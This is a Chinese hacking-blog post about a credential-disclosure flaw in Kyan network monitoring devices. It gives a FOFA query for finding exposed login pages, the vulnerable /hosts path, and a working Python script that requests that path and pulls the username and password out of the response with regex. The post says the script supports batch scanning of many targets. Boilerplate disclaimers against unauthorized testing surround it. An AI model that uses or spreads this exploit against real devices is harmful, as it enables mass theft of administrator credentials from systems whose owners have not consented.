记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

Kyan网络监控账号密码泄露

2021-04-23 08:28

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语法:

title="platform - Login"


POC:

http://url/hosts


脚本利用:

支持多个批量扫描、支持单个检测、支持直接获取账号密码

def poc(url):  target = url+"/hosts"  r = requests.get(url=target,timeout=5,verify=False)  if r.status_code==200 and "UserName" in r.text:    print(target+"  "+"漏洞存在!")    s = str(r.text)    match = re.findall(r'(?<=UserName=).[a-zA-z0-9_]*',s,re.I|re.M) #提取UserName右边的字符串    if match:      print("账号为: "+match[0])    else:      print("错误")    match1 = re.findall(r'(?<=Password=).*',s,re.I|re.M) #提取Password右边的字符串    if match1:      print("密码为: "+match1[0])    else:      print("错误")  else:    print(target+"    "+"漏洞不存在!")

利用截图:

脚本获取请回复:Kyan泄密


切勿用于非法测试!

切勿用于非法测试!

切勿用于非法测试!


知识来源: https://mp.weixin.qq.com/s?__biz=MzkxMTE1NjMyMA==&mid=2247483880&idx=1&sn=e7565728da7ae59e7c649f7c280a6b43

阅读:128161 | 评论:0 | 标签:泄露 网络

想收藏或者和大家分享这篇好文章→复制链接地址

“Kyan网络监控账号密码泄露”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

↓赞助商 🙇🧎

标签云 ☁